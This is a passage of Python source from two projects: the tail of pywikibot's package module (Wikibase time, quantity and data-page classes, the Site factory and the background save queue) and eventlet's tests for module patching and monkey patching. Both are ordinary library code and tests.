precision)*radius*math.cos(math.radians(self.lat))
But this is not valid, since it returns a float value for dim which is
an integer. We must round it off to the nearest integer.
Therefore::
dim = int(round(math.radians(
precision)*radius*math.cos(math.radians(self.lat))))
"""
if self._dim is None and self._precision is None:
raise ValueError('No values set for dim or precision')
if self._dim is None and self._precision is not None:
radius = 6378137
self._dim = int(
round(
math.radians(self._precision) * radius * math.cos(
math.radians(self.lat))
)
)
return self._dim
def get_globe_item(self, repo: Optional[DataSite] = None,
lazy_load: bool = False):
"""
Return the ItemPage corresponding to the globe.
Note that the globe need not be in the same data repository as the
Coordinate itself.
A successful lookup is stored as an internal value to avoid the need
for repeated lookups.
@param repo: the Wikibase site for the globe, if different from that
provided with the Coordinate.
@param lazy_load: Do not raise NoPage if ItemPage does not exist.
@return: pywikibot.ItemPage
"""
if isinstance(self._entity, ItemPage):
return self._entity
repo = repo or self.site
return ItemPage.from_entity_uri(repo, self.entity, lazy_load)
class WbTime(_WbRepresentation):
"""A Wikibase time representation."""
PRECISION = {'1000000000': 0,
'100000000': 1,
'10000000': 2,
'1000000': 3,
'100000': 4,
'10000': 5,
'millenia': 6,
'century': 7,
'decade': 8,
'year': 9,
'month': 10,
'day': 11,
'hour': 12,
'minute': 13,
'second': 14
}
FORMATSTR = '{0:+012d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}Z'
_items = ('year', 'month', 'day', 'hour', 'minute', 'second',
'precision', 'before', 'after', 'timezone', 'calendarmodel')
def __init__(self,
year: Optional[int] = None,
month: Optional[int] = None,
day: Optional[int] = None,
hour: Optional[int] = None,
minute: Optional[int] = None,
second: Optional[int] = None,
precision: Union[int, str, None] = None,
before: int = 0,
after: int = 0,
timezone: int = 0,
calendarmodel: Optional[str] = None,
site: Optional[DataSite] = None):
"""Create a new WbTime object.
The precision can be set by the Wikibase int value (0-14) or by a human
readable string, e.g., 'hour'. If no precision is given, it is set
according to the given time units.
Timezone information is given in three different ways depending on the
time:
* Times after the implementation of UTC (1972): as an offset from UTC
in minutes;
* Times before the implementation of UTC: the offset of the time zone
from universal time;
* Before the implementation of time zones: The longitude of the place
of the event, in the range −180° to 180°, multiplied by 4 to convert
to minutes.
@param year: The year as a signed integer of between 1 and 16 digits.
@param month: Month
@param day: Day
@param hour: Hour
@param minute: Minute
@param second: Second
@param precision: The unit of the precision of the time.
@param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
@param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
@param timezone: Timezone information in minutes.
@param calendarmodel: URI identifying the calendar model
@param site: The Wikibase site
"""
if year is None:
raise ValueError('no year given')
self.precision = self.PRECISION['second']
if second is None:
self.precision = self.PRECISION['minute']
second = 0
if minute is None:
self.precision = self.PRECISION['hour']
minute = 0
if hour is None:
self.precision = self.PRECISION['day']
hour = 0
if day is None:
self.precision = self.PRECISION['month']
day = 1
if month is None:
self.precision = self.PRECISION['year']
month = 1
self.year = year
self.month = month
self.day = day
self.hour = hour
self.minute = minute
self.second = second
self.after = after
self.before = before
self.timezone = timezone
if calendarmodel is None:
if site is None:
site = Site().data_repository()
if site is None:
raise ValueError('Site %s has no data repository' % Site())
calendarmodel = site.calendarmodel()
self.calendarmodel = calendarmodel
# if precision is given it overwrites the autodetection above
if precision is not None:
if (isinstance(precision, int)
and precision in self.PRECISION.values()):
self.precision = precision
elif precision in self.PRECISION:
self.precision = self.PRECISION[precision]
else:
raise ValueError('Invalid precision: "%s"' % precision)
@classmethod
def fromTimestr(cls,
datetimestr: str,
precision: Union[int, str] = 14,
before: int = 0,
after: int = 0,
timezone: int = 0,
calendarmodel: Optional[str] = None,
site: Optional[DataSite] = None):
"""Create a new WbTime object from a UTC date/time string.
The timestamp differs from ISO 8601 in that:
* The year is always signed and having between 1 and 16 digits;
* The month, day and time are zero if they are unknown;
* The Z is discarded since time zone is determined from the timezone
param.
@param datetimestr: Timestamp in a format resembling ISO 8601,
e.g. +2013-01-01T00:00:00Z
@param precision: The unit of the precision of the time.
@param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
@param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
@param timezone: Timezone information in minutes.
@param calendarmodel: URI identifying the calendar model
@param site: The Wikibase site
@rtype: pywikibot.WbTime
"""
match = re.match(r'([-+]?\d+)-(\d+)-(\d+)T(\d+):(\d+):(\d+)Z',
datetimestr)
if not match:
raise ValueError("Invalid format: '%s'" % datetimestr)
t = match.groups()
return cls(int(t[0]), int(t[1]), int(t[2]),
int(t[3]), int(t[4]), int(t[5]),
precision, before, after, timezone, calendarmodel, site)
@classmethod
def fromTimestamp(cls, timestamp, precision: Union[int, str] = 14,
before: int = 0, after: int = 0,
timezone: int = 0, calendarmodel: Optional[str] = None,
site: Optional[DataSite] = None):
"""
Create a new WbTime object from a pywikibot.Timestamp.
@param timestamp: Timestamp
@type timestamp: pywikibot.Timestamp
@param precision: The unit of the precision of the time.
@param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
@param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
@param timezone: Timezone information in minutes.
@param calendarmodel: URI identifying the calendar model
@param site: The Wikibase site
@rtype: pywikibot.WbTime
"""
return cls.fromTimestr(timestamp.isoformat(), precision=precision,
before=before, after=after,
timezone=timezone, calendarmodel=calendarmodel,
site=site)
def toTimestr(self, force_iso: bool = False) -> str:
"""
Convert the data to a UTC date/time string.
See fromTimestr() for differences between output with and without
force_iso.
@param force_iso: whether the output should be forced to ISO 8601
@return: Timestamp in a format resembling ISO 8601
"""
if force_iso:
return Timestamp._ISO8601Format_new.format(
self.year, max(1, self.month), max(1, self.day),
self.hour, self.minute, self.second)
return self.FORMATSTR.format(self.year, self.month, self.day,
self.hour, self.minute, self.second)
def toTimestamp(self) -> Timestamp:
"""
Convert the data to a pywikibot.Timestamp.
@raises ValueError: instance value cannot be represented using
Timestamp
"""
if self.year <= 0:
raise ValueError('You cannot turn BC dates into a Timestamp')
return Timestamp.fromISOformat(
self.toTimestr(force_iso=True).lstrip('+'))
def toWikibase(self) -> dict:
"""
Convert the data to a JSON object for the Wikibase API.
@return: Wikibase JSON
"""
json = {'time': self.toTimestr(),
'precision': self.precision,
'after': self.after,
'before': self.before,
'timezone': self.timezone,
'calendarmodel': self.calendarmodel
}
return json
@classmethod
def fromWikibase(cls, wb: dict, site: Optional[DataSite] = None):
"""
Create a WbTime from the JSON data given by the Wikibase API.
@param wb: Wikibase JSON
@param site: The Wikibase site
@rtype: pywikibot.WbTime
"""
return cls.fromTimestr(wb['time'], wb['precision'],
wb['before'], wb['after'],
wb['timezone'], wb['calendarmodel'], site)
class WbQuantity(_WbRepresentation):
"""A Wikibase quantity representation."""
_items = ('amount', 'upperBound', 'lowerBound', 'unit')
@staticmethod
def _require_errors(site: DataSite) -> bool:
"""
Check if Wikibase site is so old it requires error bounds to be given.
If no site item is supplied it raises a warning and returns True.
@param site: The Wikibase site
"""
if not site:
warning(
"WbQuantity now expects a 'site' parameter. This is needed to "
'ensure correct handling of error bounds.')
return False
return site.mw_version < '1.29.0-wmf.2'
@staticmethod
def _todecimal(value: str) -> Optional[Decimal]:
"""
Convert a string to a Decimal for use in WbQuantity.
None value is returned as is.
@param value: decimal number to convert
"""
if isinstance(value, Decimal):
return value
if value is None:
return None
return Decimal(str(value))
@staticmethod
def _fromdecimal(value: Decimal) -> Optional[str]:
"""
Convert a Decimal to a string representation suitable for WikiBase.
None value is returned as is.
@param value: decimal number to convert
"""
if value is None:
return None
return format(value, '+g')
def __init__(self, amount, unit=None, error=None,
site: Optional[DataSite] = None):
"""
Create a new WbQuantity object.
@param amount: number representing this quantity
@type amount: str or Decimal. Other types are accepted, and
converted via str to Decimal.
@param unit: the Wikibase item for the unit or the entity URI of this
Wikibase item.
@type unit: pywikibot.ItemPage, str or None
@param error: the uncertainty of the amount (e.g. ±1)
@type error: same as amount, or tuple of two values, where the first
value is the upper error and the second is the lower error value.
@param site: The Wikibase site
"""
if amount is None:
raise ValueError('no amount given')
self.amount = self._todecimal(amount)
self._unit = unit
self.site = site or Site().data_repository()
# also allow entity URIs to be provided via unit parameter
if isinstance(unit, str) \
and unit.partition('://')[0] not in ('http', 'https'):
raise ValueError("'unit' must be an ItemPage or entity uri.")
if error is None and not self._require_errors(site):
self.upperBound = self.lowerBound = None
else:
if error is None:
upperError = lowerError = Decimal(0)
elif isinstance(error, tuple):
upperError = self._todecimal(error[0])
lowerError = self._todecimal(error[1])
else:
upperError = lowerError = self._todecimal(error)
self.upperBound = self.amount + upperError
self.lowerBound = self.amount - lowerError
@property
def unit(self):
"""Return _unit's entity uri or '1' if _unit is None."""
if isinstance(self._unit, ItemPage):
return self._unit.concept_uri()
return self._unit or '1'
def get_unit_item(self, repo: Optional[DataSite] = None,
lazy_load: bool = False):
"""
Return the ItemPage corresponding to the unit.
Note that the unit need not be in the same data repository as the
WbQuantity itself.
A successful lookup is stored as an internal value to avoid the need
for repeated lookups.
@param repo: the Wikibase site for the unit, if different from that
provided with the WbQuantity.
@param lazy_load: Do not raise NoPage if ItemPage does not exist.
@return: pywikibot.ItemPage
"""
if not isinstance(self._unit, str):
return self._unit
repo = repo or self.site
self._unit = ItemPage.from_entity_uri(repo, self._unit, lazy_load)
return self._unit
def toWikibase(self) -> dict:
"""
Convert the data to a JSON object for the Wikibase API.
@return: Wikibase JSON
"""
json = {'amount': self._fromdecimal(self.amount),
'upperBound': self._fromdecimal(self.upperBound),
'lowerBound': self._fromdecimal(self.lowerBound),
'unit': self.unit
}
return json
@classmethod
def fromWikibase(cls, wb: dict, site: Optional[DataSite] = None):
"""
Create a WbQuantity from the JSON data given by the Wikibase API.
@param wb: Wikibase JSON
@param site: The Wikibase site
@rtype: pywikibot.WbQuantity
"""
amount = cls._todecimal(wb['amount'])
upperBound = cls._todecimal(wb.get('upperBound'))
lowerBound = cls._todecimal(wb.get('lowerBound'))
bounds_provided = (upperBound is not None and lowerBound is not None)
error = None
if bounds_provided or cls._require_errors(site):
error = (upperBound - amount, amount - lowerBound)
if wb['unit'] == '1':
unit = None
else:
unit = wb['unit']
return cls(amount, unit, error, site)
class WbMonolingualText(_WbRepresentation):
"""A Wikibase monolingual text representation."""
_items = ('text', 'language')
def __init__(self, text: str, language: str):
"""
Create a new WbMonolingualText object.
@param text: text string
@param language: language code of the string
"""
if not text or not language:
raise ValueError('text and language cannot be empty')
self.text = text
self.language = language
def toWikibase(self) -> dict:
"""
Convert the data to a JSON object for the Wikibase API.
@return: Wikibase JSON
"""
json = {'text': self.text,
'language': self.language
}
return json
@classmethod
def fromWikibase(cls, wb: dict):
"""
Create a WbMonolingualText from the JSON data given by Wikibase API.
@param wb: Wikibase JSON
@rtype: pywikibot.WbMonolingualText
"""
return cls(wb['text'], wb['language'])
class _WbDataPage(_WbRepresentation):
"""
A Wikibase representation for data pages.
A temporary implementation until T162336 has been resolved.
Note that this class cannot be used directly
"""
_items = ('page', )
@classmethod
def _get_data_site(cls, repo_site: DataSite) -> APISite:
"""
Return the site serving as a repository for a given data type.
Must be implemented in the extended class.
@param repo_site: The Wikibase site
"""
raise NotImplementedError
@classmethod
def _get_type_specifics(cls, site: DataSite) -> dict:
"""
Return the specifics for a given data type.
Must be implemented in the extended class.
The dict should have three keys:
* ending: str, required filetype-like ending in page titles.
* label: str, describing the data type for use in error messages.
* data_site: APISite, site serving as a repository for
the given data type.
@param site: The Wikibase site
"""
raise NotImplementedError
@staticmethod
def _validate(page, data_site, ending: str, label: str):
"""
Validate the provided page against general and type specific rules.
@param page: Page containing the data.
@type page: pywikibot.Page
@param data_site: The site serving as a repository for the given
data type.
@type data_site: APISite
@param ending: Required filetype-like ending in page titles.
E.g. '.map'
@param label: Label describing the data type in error messages.
"""
if not isinstance(page, Page):
raise ValueError(
'Page {} must be a pywikibot.Page object not a {}.'
.format(page, type(page)))
# validate page exists
if not page.exists():
raise ValueError('Page {} must exist.'.format(page))
# validate page is on the right site, and that site supports the type
if not data_site:
raise ValueError(
'The provided site does not support {0}.'.format(label))
if page.site != data_site:
raise ValueError(
'Page must be on the {0} repository site.'.format(label))
# validate page title fulfills hard-coded Wikibase requirement
# pcre regexp: '/^Data:[^\\[\\]#\\\:{|}]+\.map$/u' for geo-shape
# pcre regexp: '/^Data:[^\\[\\]#\\\:{|}]+\.tab$/u' for tabular-data
# As we have already checked for existence the following simplified
# check should be enough.
if not page.title().startswith('Data:') \
or not page.title().endswith(ending):
raise ValueError(
"Page must be in 'Data:' namespace and end in '{0}' "
'for {1}.'.format(ending, label))
def __init__(self, page, site: Optional[DataSite] = None):
"""
Create a new _WbDataPage object.
@param page: page containing the data
@type page: pywikibot.Page
@param site: The Wikibase site
"""
site = site or Site().data_repository()
specifics = type(self)._get_type_specifics(site)
_WbDataPage._validate(page, specifics['data_site'],
specifics['ending'], specifics['label'])
self.page = page
def __hash__(self):
"""Override super.hash() as toWikibase is a string for _WbDataPage."""
return hash(self.toWikibase())
def toWikibase(self) -> str:
"""
Convert the data to the value required by the Wikibase API.
@return: title of the data page incl. namespace
"""
return self.page.title()
@classmethod
def fromWikibase(cls, page_name: str, site: DataSite):
"""
Create a _WbDataPage from the JSON data given by the Wikibase API.
@param page_name: page name from Wikibase value
@param site: The Wikibase site
@rtype: pywikibot._WbDataPage
"""
data_site = cls._get_data_site(site)
page = Page(data_site, page_name)
return cls(page, site)
class WbGeoShape(_WbDataPage):
"""A Wikibase geo-shape representation."""
@classmethod
def _get_data_site(cls, site: DataSite) -> APISite:
"""
Return the site serving as a geo-shape repository.
@param site: The Wikibase site
"""
return site.geo_shape_repository()
@classmethod
def _get_type_specifics(cls, site: DataSite) -> dict:
"""
Return the specifics for WbGeoShape.
@param site: The Wikibase site
"""
specifics = {
'ending': '.map',
'label': 'geo-shape',
'data_site': cls._get_data_site(site)
}
return specifics
class WbTabularData(_WbDataPage):
"""A Wikibase tabular-data representation."""
@classmethod
def _get_data_site(cls, site: DataSite) -> APISite:
"""
Return the site serving as a tabular-data repository.
@param site: The Wikibase site
"""
return site.tabular_data_repository()
@classmethod
def _get_type_specifics(cls, site: DataSite) -> dict:
"""
Return the specifics for WbTabularData.
@param site: The Wikibase site
"""
specifics = {
'ending': '.tab',
'label': 'tabular-data',
'data_site': cls._get_data_site(site)
}
return specifics
class WbUnknown(_WbRepresentation):
"""
A Wikibase representation for unknown data type.
This will prevent the bot from breaking completely when a new type
is introduced.
This data type is just a json container
"""
_items = ('json',)
def __init__(self, json):
"""
Create a new WbUnknown object.
@param json: Wikibase JSON
"""
self.json = json
def toWikibase(self) -> dict:
"""
Return the JSON object for the Wikibase API.
@return: Wikibase JSON
"""
return self.json
@classmethod
def fromWikibase(cls, json: dict):
"""
Create a WbUnknown from the JSON data given by the Wikibase API.
@param json: Wikibase JSON
@rtype: pywikibot.WbUnknown
"""
return cls(json)
_sites = {}
@cache
def _code_fam_from_url(url: str, name: Optional[str] = None):
"""Set url to cache and get code and family from cache.
Site helper method.
@param url: The site URL to get code and family
@param name: A family name used by AutoFamily
"""
matched_sites = []
# Iterate through all families and look, which does apply to
# the given URL
for fam in config.family_files:
family = Family.load(fam)
code = family.from_url(url)
if code is not None:
matched_sites.append((code, family))
if not matched_sites:
if not name: # create a name from url
name = urlparse(url).netloc.split('.')[-2]
name = removesuffix(name, 'wiki')
family = AutoFamily(name, url)
matched_sites.append((family.code, family))
if len(matched_sites) > 1:
warning('Found multiple matches for URL "{}": {} (use first)'
.format(url, ', '.join(str(s) for s in matched_sites)))
return matched_sites[0]
@_deprecate_arg('sysop', None)
def Site(code: Optional[str] = None, fam=None, user: Optional[str] = None, *,
interface=None,
url: Optional[str] = None) -> Union[APISite, DataSite, ClosedSite]:
"""A factory method to obtain a Site object.
Site objects are cached and reused by this method.
By default rely on config settings. These defaults may all be overridden
using the method parameters.
@param code: language code (override config.mylang)
code may also be a sitename like 'wikipedia:test'
@param fam: family name or object (override config.family)
@type fam: str or pywikibot.family.Family
@param user: bot user name to use on this site (override config.usernames)
@param interface: site class or name of class in pywikibot.site
(override config.site_interface)
@type interface: subclass of L{pywikibot.site.BaseSite} or string
@param url: Instead of code and fam, does try to get a Site based on the
URL. Still requires that the family supporting that URL exists.
@raises ValueError: URL and pair of code and family given
@raises ValueError: Invalid interface name
"""
_logger = 'wiki'
if url:
# Either code and fam or url with optional fam for AutoFamily name
if code:
raise ValueError(
'URL to the wiki OR a pair of code and family name '
'should be provided')
code, fam = _code_fam_from_url(url, fam)
elif code and ':' in code:
if fam:
raise ValueError(
'sitename OR a pair of code and family name '
'should be provided')
fam, _, code = code.partition(':')
else:
# Fallback to config defaults
code = code or config.mylang
fam = fam or config.family
if not isinstance(fam, Family):
fam = Family.load(fam)
interface = interface or fam.interface(code)
# config.usernames is initialised with a defaultdict for each family name
family_name = str(fam)
code_to_user = {}
if '*' in config.usernames: # T253127: usernames is a defaultdict
code_to_user = config.usernames['*'].copy()
code_to_user.update(config.usernames[family_name])
user = user or code_to_user.get(code) or code_to_user.get('*')
if not isinstance(interface, type):
# If it isn't a class, assume it is a string
try:
tmp = __import__('pywikibot.site', fromlist=[interface])
except ImportError:
raise ValueError('Invalid interface name: {0}'.format(interface))
else:
interface = getattr(tmp, interface)
if not issubclass(interface, BaseSite):
warning('Site called with interface=%s' % interface.__name__)
user = normalize_username(user)
key = '%s:%s:%s:%s' % (interface.__name__, fam, code, user)
if key not in _sites or not isinstance(_sites[key], interface):
_sites[key] = interface(code=code, fam=fam, user=user)
debug("Instantiated %s object '%s'"
% (interface.__name__, _sites[key]), _logger)
if _sites[key].code != code:
warn('Site %s instantiated using different code "%s"'
% (_sites[key], code), UserWarning, 2)
return _sites[key]
# alias for backwards-compability
getSite = redirect_func(Site, old_name='getSite', since='20150924',
future_warning=True)
# These imports depend on Wb* classes above.
from pywikibot.page import ( # noqa: E402
Page,
FilePage,
Category,
Link,
SiteLink,
User,
ItemPage,
PropertyPage,
Claim,
)
from pywikibot.page import ( # noqa: E402
html2unicode, url2unicode, unicode2html)
link_regex = re.compile(r'\[\[(?P<title>[^\]|[<>{}]*)(\|.*?)?\]\]')
def showDiff(oldtext, newtext, context=0):
"""
Output a string showing the differences between oldtext and newtext.
The differences are highlighted (only on compatible systems) to show which
changes were made.
"""
PatchManager(oldtext, newtext, context=context).print_hunks()
# Throttle and thread handling
def sleep(secs):
"""Suspend execution of the current thread for the given number of seconds.
Drop this process from the throttle log if wait time is greater than
30 seconds.
"""
if secs >= 30:
stopme()
time.sleep(secs)
def stopme():
"""
Drop this process from the throttle log, after pending threads finish.
Can be called manually if desired. Does not clean async_manager.
This should be run when a bot does not interact with the Wiki, or
when it has stopped doing so. After a bot has run stopme() it will
not slow down other bots any more.
"""
_flush(False)
def _flush(stop=True):
"""
Drop this process from the throttle log, after pending threads finish.
Wait for the page-putter to flush its queue. Also drop this process from
the throttle log. Called automatically at Python exit.
"""
_logger = 'wiki'
debug('_flush() called', _logger)
def remaining():
remainingPages = page_put_queue.qsize()
if stop:
# -1 because we added a None element to stop the queue
remainingPages -= 1
remainingSeconds = datetime.timedelta(
seconds=round(remainingPages * config.put_throttle))
return (remainingPages, remainingSeconds)
if stop:
# None task element leaves async_manager
page_put_queue.put((None, [], {}))
num, sec = remaining()
if num > 0 and sec.total_seconds() > config.noisysleep:
output(color_format(
'{lightblue}Waiting for {num} pages to be put. '
'Estimated time remaining: {sec}{default}', num=num, sec=sec))
if _putthread is not threading.current_thread():
while (_putthread.is_alive()
and (page_put_queue.qsize() > 0
or page_put_queue_busy.qsize() > 0)):
try:
_putthread.join(1)
except KeyboardInterrupt:
if input_yn('There are {} pages remaining in the queue. '
'Estimated time remaining: {}\nReally exit?'
.format(*remaining()),
default=False, automatic_quit=False):
break
# only need one drop() call because all throttles use the same global pid
with suppress(IndexError):
list(_sites.values())[0].throttle.drop()
log('Dropped throttle(s).')
atexit.register(_flush)
# Create a separate thread for asynchronous page saves (and other requests)
def async_manager():
"""Daemon; take requests from the queue and execute them in background."""
while True:
(request, args, kwargs) = page_put_queue.get()
page_put_queue_busy.put(None)
if request is None:
break
request(*args, **kwargs)
page_put_queue.task_done()
page_put_queue_busy.get()
def async_request(request, *args, **kwargs):
"""Put a request on the queue, and start the daemon if necessary."""
if not _putthread.is_alive():
try:
page_put_queue.mutex.acquire()
with suppress(AssertionError, RuntimeError):
_putthread.start()
finally:
page_put_queue.mutex.release()
page_put_queue.put((request, args, kwargs))
# queue to hold pending requests
page_put_queue = Queue(config.max_queue_size)
# queue to signal that async_manager is working on a request. See T147178.
page_put_queue_busy = Queue(config.max_queue_size)
# set up the background thread
_putthread = threading.Thread(target=async_manager)
# identification for debugging purposes
_putthread.setName('Put-Thread')
_putthread.setDaemon(True)
wrapper = _ModuleDeprecationWrapper(__name__)
wrapper._add_deprecated_attr(
'QuitKeyboardInterrupt', _QuitKeyboardInterrupt,
warning_message='pywikibot.QuitKeyboardInterrupt is deprecated; '
'use pywikibot.bot.QuitKeyboardInterrupt instead.',
since='20150619', future_warning=True)
wrapper._add_deprecated_attr(
'MediaWikiVersion', _MediaWikiVersion,
warning_message='pywikibot.MediaWikiVersion is deprecated; '
'use pywikibot.tools.MediaWikiVersion instead.',
since='20180827')
wrapper._add_deprecated_attr('__release__', __version__,
replacement_name='pywikibot.__version__',
since='20200707')
wrapper._add_deprecated_attr('showHelp', show_help,
since='20200705', future_warning=True)
|
patcher_test.py
|
import os
import shutil
import sys
import tempfile
import six
import tests
base_module_contents = """
import socket
import urllib
print("base {0} {1}".format(socket, urllib))
"""
patching_module_contents = """
from eventlet.green import socket
from eventlet.green import urllib
from eventlet import patcher
print('patcher {0} {1}'.format(socket, urllib))
patcher.inject('base', globals(), ('socket', socket), ('urllib', urllib))
del patcher
"""
import_module_contents = """
import patching
import socket
print("importing {0} {1} {2} {3}".format(patching, socket, patching.socket, patching.urllib))
"""
class ProcessBase(tests.LimitedTestCase):
TEST_TIMEOUT = 3 # starting processes is time-consuming
def setUp(self):
super(ProcessBase, self).setUp()
self._saved_syspath = sys.path
self.tempdir = tempfile.mkdtemp('_patcher_test')
def tearDown(self):
super(ProcessBase, self).tearDown()
sys.path = self._saved_syspath
shutil.rmtree(self.tempdir)
def write_to_tempfile(self, name, contents):
filename = os.path.join(self.tempdir, name)
if not filename.endswith('.py'):
filename = filename + '.py'
with open(filename, "w") as fd:
fd.write(contents)
def launch_subprocess(self, filename):
path = os.path.join(self.tempdir, filename)
output = tests.run_python(path)
if six.PY3:
output = output.decode('utf-8')
separator = '\n'
else:
separator = b'\n'
lines = output.split(separator)
return output, lines
def run_script(self, contents, modname=None):
if modname is None:
modname = "testmod"
self.write_to_tempfile(modname, contents)
return self.launch_subprocess(modname)
class ImportPatched(ProcessBase):
def test_patch_a_module(self):
self.write_to_tempfile("base", base_module_contents)
self.write_to_tempfile("patching", patching_module_contents)
self.write_to_tempfile("importing", import_module_contents)
output, lines = self.launch_subprocess('importing.py')
assert lines[0].startswith('patcher'), repr(output)
assert lines[1].startswith('base'), repr(output)
assert lines[2].startswith('importing'), repr(output)
assert 'eventlet.green.socket' in lines[1], repr(output)
assert 'eventlet.green.urllib' in lines[1], repr(output)
assert 'eventlet.green.socket' in lines[2], repr(output)
assert 'eventlet.green.urllib' in lines[2], repr(output)
assert 'eventlet.green.httplib' not in lines[2], repr(output)
def test_import_patched_defaults():
tests.run_isolated('patcher_import_patched_defaults.py')
def test_import_patched_handles_sub_modules():
tests.run_isolated('test_sub_module_in_import_patched/test.py')
class MonkeyPatch(ProcessBase):
def test_patched_modules(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch()
import socket
try:
import urllib.request as urllib
except ImportError:
import urllib
print("newmod {0} {1}".format(socket.socket, urllib.socket.socket))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
assert lines[0].startswith('newmod'), repr(output)
self.assertEqual(lines[0].count('GreenSocket'), 2, repr(output))
def test_early_patching(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch()
import eventlet
eventlet.sleep(0.01)
print("newmod")
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, repr(output))
assert lines[0].startswith('newmod'), repr(output)
def test_late_patching(self):
new_mod = """
import eventlet
eventlet.sleep(0.01)
from eventlet import patcher
patcher.monkey_patch()
eventlet.sleep(0.01)
print("newmod")
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, repr(output))
assert lines[0].startswith('newmod'), repr(output)
def test_typeerror(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch(finagle=True)
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
assert lines[-2].startswith('TypeError'), repr(output)
assert 'finagle' in lines[-2], repr(output)
def assert_boolean_logic(self, call, expected, not_expected=''):
expected_list = ", ".join(['"%s"' % x for x in expected.split(',') if len(x)])
not_expected_list = ", ".join(['"%s"' % x for x in not_expected.split(',') if len(x)])
new_mod = """
from eventlet import patcher
%s
for mod in [%s]:
assert patcher.is_monkey_patched(mod), mod
for mod in [%s]:
assert not patcher.is_monkey_patched(mod), mod
print("already_patched {0}".format(",".join(sorted(patcher.already_patched.keys()))))
""" % (call, expected_list, not_expected_list)
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
ap = 'already_patched'
assert lines[0].startswith(ap), repr(output)
patched_modules = lines[0][len(ap):].strip()
# psycopg might or might not be patched based on installed modules
patched_modules = patched_modules.replace("psycopg,", "")
# ditto for MySQLdb
patched_modules = patched_modules.replace("MySQLdb,", "")
self.assertEqual(
patched_modules, expected,
"Logic:%s\nExpected: %s != %s" % (call, expected, patched_modules))
def test_boolean(self):
self.assert_boolean_logic("patcher.monkey_patch()",
'os,select,socket,subprocess,thread,time')
def test_boolean_all(self):
self.assert_boolean_logic("patcher.monkey_patch(all=True)",
'os,select,socket,subprocess,thread,time')
def test_boolean_all_single(self):
self.assert_boolean_logic("patcher.monkey_patch(all=True, socket=True)",
'os,select,socket,subprocess,thread,time')
def test_boolean_all_negative(self):
self.assert_boolean_logic(
"patcher.monkey_patch(all=False, socket=False, select=True)",
'select')
def test_boolean_single(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=True)",
'socket')
def test_boolean_double(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=True, select=True)",
'select,socket')
def test_boolean_negative(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False)",
'os,select,subprocess,thread,time')
def test_boolean_negative2(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False, time=False)",
'os,select,subprocess,thread')
def test_conflicting_specifications(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False, select=True)",
'select')
test_monkey_patch_threading = """
def test_monkey_patch_threading():
tickcount = [0]
def tick():
import six
for i in six.moves.range(1000):
tickcount[0] += 1
eventlet.sleep()
def do_sleep():
tpool.execute(time.sleep, 0.5)
eventlet.spawn(tick)
w1 = eventlet.spawn(do_sleep)
w1.wait()
print(tickcount[0])
assert tickcount[0] > 900
tpool.killall()
"""
class Tpool(ProcessBase):
TEST_TIMEOUT = 3
@tests.skip_with_pyevent
def test_simple(self):
new_mod = """
import eventlet
from eventlet import patcher
patcher.monkey_patch()
from eventlet import tpool
print("newmod {0}".format(tpool.execute(len, "hi")))
print("newmod {0}".format(tpool.execute(len, "hi2")))
tpool.killall()
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, output)
assert lines[0].startswith('newmod'), repr(output)
assert '2' in lines[0], repr(output)
assert '3' in lines[1], repr(output)
@tests.skip_with_pyevent
def test_unpatched_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch(time=False, thread=False)
from eventlet import tpool
import time
"""
new_mod += test_monkey_patch_threading
new_mod += "\ntest_monkey_patch_threading()\n"
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, lines)
@tests.skip_with_pyevent
def test_patched_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch(time=False, thread=True)
from eventlet import tpool
import time
"""
new_mod += test_monkey_patch_threading
new_mod += "\ntest_monkey_patch_threading()\n"
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
def test_subprocess_after_monkey_patch():
code = '''\
import sys
import eventlet
eventlet.monkey_patch()
from eventlet.green import subprocess
subprocess.Popen([sys.executable, '-c', ''], stdin=subprocess.PIPE).wait()
print('pass')
'''
output = tests.run_python(
path=None,
args=['-c', code],
)
assert output.rstrip() == b'pass'
class Threading(ProcessBase):
def test_orig_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import patcher
import threading
_threading = patcher.original('threading')
def test():
print(repr(threading.currentThread()))
t = _threading.Thread(target=test)
t.start()
t.join()
print(len(threading._active))
print(len(_threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 4, "\n".join(lines))
assert lines[0].startswith('<Thread'), lines[0]
assert lines[1] == '1', lines
assert lines[2] == '1', lines
def test_tpool(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import tpool
import threading
def test():
print(repr(threading.currentThread()))
tpool.execute(test)
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<Thread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_greenlet(self):
